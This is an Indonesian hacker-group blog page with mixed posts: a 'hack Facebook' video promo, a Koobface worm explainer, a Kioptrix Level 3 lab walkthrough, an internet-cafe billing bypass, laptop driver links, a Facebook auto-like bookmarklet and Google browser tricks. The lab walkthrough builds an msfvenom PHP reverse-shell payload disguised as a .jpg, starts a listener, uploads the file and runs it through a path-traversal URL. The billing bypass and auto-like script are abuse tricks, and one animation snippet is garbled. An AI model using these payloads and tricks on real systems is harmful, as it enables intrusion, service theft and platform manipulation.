./Jufrye
Gaptek
today : | at : | safemode : ON
> Thankz To :/ AnonymouZ / Xh4x0r / Enda PNT / Awang Shellovers / L1n9g4 / Mhydisa / Aditra HNc / Gorontalo Defacer Crew ^ Hacker Newbie ^ PLanetwork Team ^ Lampung Cyber ^ ANd You /
name author perms com modified label

Hack Facebook dengan Aplikasi Terkenal, Bisa Didownload dan Garansi 100% jufry-gaptek rwxr-xr-x 1 21.06

Filename Hack Facebook dengan Aplikasi Terkenal, Bisa Didownload dan Garansi 100%
Permission rw-r--r--
Author jufry-gaptek
Date and Time 21.06
Label
Action
Masih bingung dengan cara hacking facebook? Frustrasi dengan aplikasi yang sulit di cari, dan tidak berfungsi? Coba perhatikan video ini, setiap aplikasi bisa di download dan berfungsi. Tentu saja berhasil! Selamat menonton, dan gunakan video ini sebijak mungkin (=

http://www.youtube.com/watch?feature=player_embedded&v=Jp0_sDolanw&noredirect=1

Virus Baru Menyerang Jejaring Sosial jufry-gaptek rwxr-xr-x 0 21.05

Filename Virus Baru Menyerang Jejaring Sosial
Permission rw-r--r--
Author jufry-gaptek
Date and Time 21.05
Label
Action
Untuk yang sering up to date tentang masalah yang terjadi dengan jejaring sosial, mungkin berita ini tidak terlalu mencengangkan. Yang mencengangkan adalah virus ini tidak terdeteksi sebagai virus. Lho, kok disebut virus? Karena basic dari virus ini adalah penyebaran yang berantai dan memiliki tujuan yang jahat. Saya akan mulai membahas virus ini secara mendalam.

Dari Mana Virus ini datang?
Belakangan diketahui virus ini adalah virus lama yang dimodifikasi oleh seorang hacker untuk menjerat akun jejaring sosial yang sedang marak digunakan sebagai sarang bisnis.

Apa yang diincar oleh hacker?
Jelas ia mengincar akun anda, kemudian mencari data penting. Contoh.
Facebook, Picasa, dan Friendster -> MEngincar foto "syur" untuk kemudian dijual kepada web dengan harga tinggi.
Twitter -> Mengincar popularitas dengan mempromosikan sesuatu.
Email -> Mengincar pesan penting yang berisi data yang mahal, seperti password administrator perusahaan, atau berkas keuangan, atau password kartu ATM.

Bagaimana virus ini bekerja?
Pada dasarnya virus ini bekerja melalui link shortener semacam goo.gl atau bit.ly dan lain sebagainya. Awalnya ia disebar melalui message, atau pesan yang lebih private, karena jika di post blak-blakan semacam status facebook, maka pihak facebook akan melakukan attach pada link yang hendak disebar. Ketika link ini tersebar, link ini akan memulai aksinya dengan melakukan aksi redirecting (membalikan) korban pada halaman awal suatu jejaring sosial (halaman log in). Kemudian user akan melakukan log in ulang dimana user dan password secara otomatis akan dikirim melalui emal kepada attacker. Setelah akun terjangkit virus, korban akan menyebarkan link ini melalui message dengan sendirinya. Dan pada akhirnya setiap user yang tidak waspada akan mengalami hal yang serupa, yaitu pambajakan akun facebook.

Bagaimana jika sudah terlanjur meng-klik link tersebut?
Apakah anda sekedar meng-klik, atau sudah terlanjur log in? Jika sekedar meng-klik link tersebut, bisa dikatakan akun anda masih selamat. Tapi jika sudah terlanjur log-in, maka akun anda sudah dalam kuasa attacker.

Apa yang harus dilakukan jika sudah terlanjur log in?
Anda bisa melakukan reset password melalui email, atau sms mobile. Kemudian buat password baru yang berbeda dengan password sebelumnya.

Seperti apa bentuk link tersebut?
Saya akan jelaskan awal dari pemahaman saya akan cara kerja virus ini. Hal ini bermula dari salah seorang teman saya yang memiliki akun twitter. Sebut saja "bunga". Beberapa hari belakangan akun bunga tampaknya baik-baik saja. Namun setelah bebrapa hari kemudian ia mengirim direct message kepada saya.

Merasa heran karena mengetahui bunga tidak mahir dalam berbahasa Inggris, saya tanyakan hal ini pada bunga. Ternya jawabannya sangat mengejutkan, bunga tidak memngirimkan DM apapun kepada saya. Keesokan harinya salah seorang teman saya sebut saja "bagong" juga mengalami hal serupa.


Kembali saya tanyakan, bagongpun juga tidak memberikan DM apapun kepada saya. [DM = Direct Message]
Penasaran, saya coba klik link tersebut, dan saya berada di halaman ini.


Saya mulai bertanya-tanya, apa yang sebenarnya terjadi. Singkat cerita, saya mengetahui bahwa ini adalah ulah dari virus WORM_KOOBFACE.DC. Untuk lebih jelasnya, saya akan bahas hal ini lebih lanjut.

Koobface adalah worm yang menargetkan pengguna situs jejaring sosial FacebookMySpace, hi5 Bebo, Friendster dan Twitter. Koobface dirancang untuk menginfeksi Microsoft Windows dan Mac OS X, tapi juga bekerja di Linux (dalam mode terbatas). Koobface berupaya untuk mengumpulkan informasi login untuk situs FTP, Facebook, dan platform media sosial lainnya, juga data keuangan yang sensitif. Ia kemudian menggunakan komputer untuk membangun botnet peer-to-peerSebuah kontak dari sebuah komputer ke komputer lain untuk menerima perintah dalam mode peer-to-peer. Botnet digunakan untuk menginstal malware pada komputer serta, membajak akun untuk menampilkan iklan. Hal ini pertama kali terdeteksi pada bulan Desember 2008 dan versi yang lebih kuat muncul pada Maret 2009. Sebuah studi oleh Warfare Informasi monitor, sebuah kolaborasi dari Grup SecDev dan Citizen Lab di Sekolah Munk Urusan global diUniversitas Toronto, telah mengungkapkan bahwa virus ini telah menghasilkan lebih dari $ 2 juta dalam Juni 2009 sampai Juniv2010 [satu tahun].

Koobface menyebar dengan memberikan pesan Facebook kepada pengguna Facebook yang komputer telah terinfeksi. Setelah pesan diterima. virus akan mengarahkan penerima ke situs web pihak ketiga, di mana mereka diminta untuk men-download apa yang sebuah aplikasi, biasanya Adobe Flash playerJika mereka men-download dan mengeksekusi file tersebut, Koobface mampu menginfeksi sistem mereka. Hal ini kemudian dapat menggunakan mesin pencari menyita komputer dan langsung menyerang situs yang terkontaminasi. Ada juga melalui link ke situs web pihak ketiga di dinding Facebook teman pesan datang dari kadang-kadang berupa komentar seperti LOL atau YOUTUBE. Jika link tersebut dibuka, virus trojan akan menginfeksi komputer dan PC akan menjadi Zombie atau Komputer Host.


Pencegahan.
Selalu waspadai link yang telah dimodifikasi menjadi lebih pendek, jangan pernah tergiur pesan yang menarik. Jangan pernah melakukan log in, atau mendownload aplikasi tertentu ketika meng-klik suatu link. Mengingat jejaring sosial sama berharganya dengan KTP anda, saya sarankan untuk menyebarkan berita peringatan ini kepada seluruh teman-teman jejaring sosial anda. Anda bisa mulai dari menyebarkan artikel ini dengan membaginya lewat tombal share twitter, atau facebook yang telah disediakan di bawah artikel ini.

Metasploit VS KIOPTRIX LV.3 jufry-gaptek rwxr-xr-x 0 21.04

Filename Metasploit VS KIOPTRIX LV.3
Permission rw-r--r--
Author jufry-gaptek
Date and Time 21.04
Label
Action
Setelah mengetahui cara mendapatkan admin password pada tutorial Gaining User Password Using SQL Injection. Sekarang saatnya masuk ke dalam sistem Web Server menggunakan metasploit.

Ini adalah lawan saya pada kesempatan ini


Preparation:
1. Metasploit Download Link
Briefing:
1. Buat shellcode backdoor dengan msfvenom
2. Jalankan exploit/multi/handler
3. Upload shellcode backdoor
4. Eksekusi shellcode backdoor
5. Game Over
Note:
Tutorial ini melanjutkan sesi dari [KIOPTRIX LV3] Gaining User Password.
Walkthrough:
1. Buat shellcode backdoor dengan msfvenom
Buka terminal, lalu masukan perintah:
root@red-dragon:~# cd /pentest/exploits/framework2/
Kemudian buat shellcode dengan perintah
root@red-dragon:/pentest/exploits/framework2# msfvenom -p php/meterpreter/reverse_tcp LHOST=ip address anda LPORT=port listener anda -f raw > direktori file yang anda inginkan/nama file yang anda inginkan.jpg
Pada kali ini, IP address saya 192.168.1.4, dan menggunakan port listener 4444. Kemudian menyimpan shell code pada /tmp/ dengan nama file exploit.jpg
Maka perintahnya:
root@red-dragon:/pentest/exploits/framework2# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 -f raw > /tmp/exploit.jpg
2. Jalankan exploit/multi/handler
Setelah membuat shell code backdoor, masukan perintah:
root@red-dragon:/pentest/exploits/framework2# msfci multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=sesuai dgn langkah 1 LPORT=sesuai dengan langkah 1 E
Sesuai dengan langkah pertama, maka perintahnya sebagai berikut:
root@red-dragon:/pentest/exploits/framework2# msfci multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 E
Jangan tutup terminal ini. Karena ini akan digunakan pada langkah 5 [terakhir].
3. Upload shellcode backdoor
Jika anda membaca post sebelumnya tentang [KIOPTRIX LV3] Gaining User Password. Maka anda sudah pasti dapat masuk ke dalam control panel. Untuk memperjelas bagaimana saya bisa masuk ke dalam control panel, saya akan berikan screenshoot pada [KIOPTRIX LV3] Gaining User Password yang menunjukan bahwa saya berhasil mendapatkan password administrator.
Masuklah ke dalam halaman upload foto.
Kemudian upload shell code backdoor yang sudah anda buat.
Note: Tahan dulu, ada baiknya kita mengecek direktory foto sebelum mengupload shell code backdoor kita.
Upload shell code backdoor, kemudian refresh halaman direktori foto. Setelah itu, cari file baru yang muncul dalam direktori tersebut.
Ada satu file baru di sini, yaitu file h942jos85u.jpg
4. Eksekusi shellcode backdoor
Setelah file h942jos85u.jpg berhasil di upload ke dalam database, sekarang saatnya mengeksekusi file tersebut. Pergilah ke halaman index, pilih tab blog. Kemudian ganti url menjadi kioptrix3.com/index.php?system=../../../../../home/www/kioptrix3.com/gallery/photos/h942jos85u.jpg.html
Kemudian tekan enter.
Tidak ada respon? Apa ada yang salah?
5. Game Over
Mari kita cek metasploit kita pada tahap 1
Apakah ini benar-benar masuk ke dalam system Web Server? Cek gambar berikut
Perhatikan kata-kata:
DISCLAIMER!
We at Kioptrix are not bla.. bla.. bla..
Bukankah kata-kata ini sama seperti kata-kata pada screen shoot pertama?

Hack billing warnet [Lumba Lumba version] jufry-gaptek rwxr-xr-x 1 20.52

Filename Hack billing warnet [Lumba Lumba version]
Permission rw-r--r--
Author jufry-gaptek
Date and Time 20.52
Label
Action
Hahahhaa,,,,kayak nya Postingan kaLi Ini Benar Benar Ngaco Deh..!!

Okeh saya mau kasih tau cara hack biLLing LUMBA LUMBA nieh,,,wakakakakakak

TKP yoo :
LANGKAH

1. - jika komputer (di warnet) dalam keadaan mati ya kalian idupin dulu (ya iya lah)
- jika dalam keadaan hidup kalian restart tu komputer

2. nah kemudian tampil windows atau desktop yang belum tertutup billing, INI KESEMPATAN KALIAN; sebelum billing itu menutupi layar kalian langsung klik atau buka mozilla atau semacamnya, yang PENTING HARUS CEPAT sebelum layar tertutup billing

3. ketika billing menutupi layar, kalian tinggal tekan alt+tab, udah deh kalian bisa main game on line sampe puas !!!

ingat, mozilla atau semacamnya harus teruka saat billing belum muncul

kalau di omelin yang punya warnet jangan nangis ya ....
hahahahaha

wakakawakakawakaka

trik ini sukses saya coba di billing lumba lumba, selamat mencoba ...

Daftar Link Driver Laptop jufry-gaptek rwxr-xr-x 0 22.08

Filename Daftar Link Driver Laptop
Permission rw-r--r--
Author jufry-gaptek
Date and Time 22.08
Label
Action
Nieh kaLi ini ane mau berbagi Link DownLoad buat kaLian yg punya LAPTOP..!!
walaupun saya gak ada LAPTOP,,,wkwkwkkwkwkkw : Ngacir3: : Ngacir3: : Ngacir3:

CEK ajah :

1. A*note :
http://www.a-note.com/
2. Acer :
http://support.acer-euro.com/drivers/downloads.html
3. Advan:
http://advandigital.com/download.php
4. ASUS, Asus eee :
http://support.asus.com/download/dow...Language=en-us
5. Axioo ( Zetta, PICO, ORIS, Neon, HDD ) :
http://id.axioo.net/region/index.php...&goto=download
6. BenQ ( Joybook ) :
http://www.benq.com/products/joybook/
http://gtc.co.id/index.php?page=shop...hk=1&Itemid=71
7. BYON :
http://www.byon.co.id/support/index.php?act=driver
8. Compaq( Evo, Armada, Concerto, Mini, LTE, Presario, dll ) :
http://h20180.www2.hp.com/apps/Nav?h...&lang=en&cc=us
9. Dell ( Inspiron, Latitude, Precision, Studio, Vostro, XPS,Studio XPS 
http://support.dell.com/support/down...=us&l=en&s=gen
10. Forsa ( Carnaval, Debut, TravelPac ) :
http://www.forsa.co.id/downloads.aspx
11. Fujitsu :
http://www.pc-ap.fujitsu.com/support/drv_lifebook.html
12. HASEE :
http://www.hasee.com/en/Qutong_Index...rodid=10000001
13. HP ( Pavilion, Omnibook, HP Compaq, dll ) :
http://h20180.www2.hp.com/apps/Nav?h...&lang=en&cc=us
14. ION :
http://www.ion.co.id/download/index.php
15. Lenovo ( ThinkPad, IdeaPad, 3000 series ) :
http://www-307.ibm.com/pc/support/si...testyle=lenovo
16. MSI (Micro-Star International):
http://asia.msi.com/index.php?func=downloadindex
17. NEC ( Versa, LitePad, Classic, LX, SX dll ) :
http://support.necam.com/mobilesolut...are/notebooks/
18. Sony ( VAIO: FJ Series, UX, TZ, NR, SZ, CR, FZ, dan AR series ):
http://www.sony.co.id/section/downloads
19. Toshiba ( Dynabook, Portege, Tecra, Satellite, Qosmio, Libretto ) :
http://pc.toshiba-asia.com/portal/public/show.action
20. Zyrex :
http://www.zyrex.com/site/downloads/Driver/

Script Auto Like Di Facebook jufry-gaptek rwxr-xr-x 0 22.03

Filename Script Auto Like Di Facebook
Permission rw-r--r--
Author jufry-gaptek
Date and Time 22.03
Label
Action
Okeh Pertama nT haruz log in duLu Bro...!!!

Teruz Copy Script Dibawah and Paste di Addres bar :

javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('-==[FB STATUS & COMMENTS LIKE GENERATOR]==-\n\nScript by 3viL666');updateTime();window.setInterval(updateTime, 1000);void(0)


Teruz Tekan Enter,,seLesai Deehhh..!!"
Wakakakkakakakak

Hal-hal aneh yang ada di Google jufry-gaptek rwxr-xr-x 0 04.46

Filename Hal-hal aneh yang ada di Google
Permission rw-r--r--
Author jufry-gaptek
Date and Time 04.46
Label
Action
Okeh kaLi ini saya akn mengungkapkan haL haL Aneh yg saya temukan di GoogLe Mas Bro,,,

1. Buka http://www.google.com, ketikkan kata “google bsd” pada keyword, lalu tekan tombol “I’m Feeling Lucky atau Saya Lagi Beruntung”.
Maka anda akan dibawa masuk ke tampilan google dengan icon google yang biasa menjadi icon bsd.

2. Buka http://www.google.com, ketikkan kata “google linux” pada keyword, lalu tekan tombol “I’m Feeling Lucky atau Saya Lagi Beruntung”.
Maka anda akan dibawa masuk ke tampilan google dengan icon google yang biasa menjadi icon Linux.

3. Buka http://www.google.com, ketikkan kata “googoth” pada keyword, lalu tekan tombol “I’m Feeling Lucky atau Saya Lagi Beruntung”.
Maka anda akan dibawa masuk ke tampilan google yang terkesan gelap dan gothic.

4. Buka http://www.google.com, ketikkan kata “ewmew fudd” pada keyword, lalu tekan tombol “I’m Feeling Lucky atau Saya Lagi Beruntung”.
Maka anda akan dibawa masuk ke ke tampilan google dengan teks versi tokoh Elmer Fudd dari Warner Bros.

5. Buka http://www.google.com, ketikkan kata “xx-klingon” pada keyword, lalu tekan tombol “I’m Feeling Lucky atau Saya Lagi Beruntung”.
Maka anda akan dibawa masuk ke tampilan google dengan bahasa suku Klingon.

6. Buka http://www.google.com, ketikkan kata “google easter egg” pada keyword, lalu tekan tombol “I’m Feeling Lucky atau Saya Lagi Beruntung”.
Maka anda akan dibawa masuk ke tampilan mesin pencari google dengan sebuah game menangkap telur paskah, dimana anda bisa mengendalikan gerak kelinci tersebut.

7. Buka http://images.google.com/, ketikkan keyword gambar yang akan anda cari, setelah google menemukan gambar yang anda cari, copy kode di bawah ini dan paste ke address bar browser anda

jR=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.right=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);

maka anda akan mendapatkan tampilan gambar yang anda cari tadi menjadi animasi berputar-putar.

8. Buka http://images.google.com/, ketikkan keyword gambar yang akan anda cari, setelah google menemukan gambar yang anda cari, copy kode di bawah ini dan paste ke address bar browser anda

jR=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.mkssddddddddddd=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)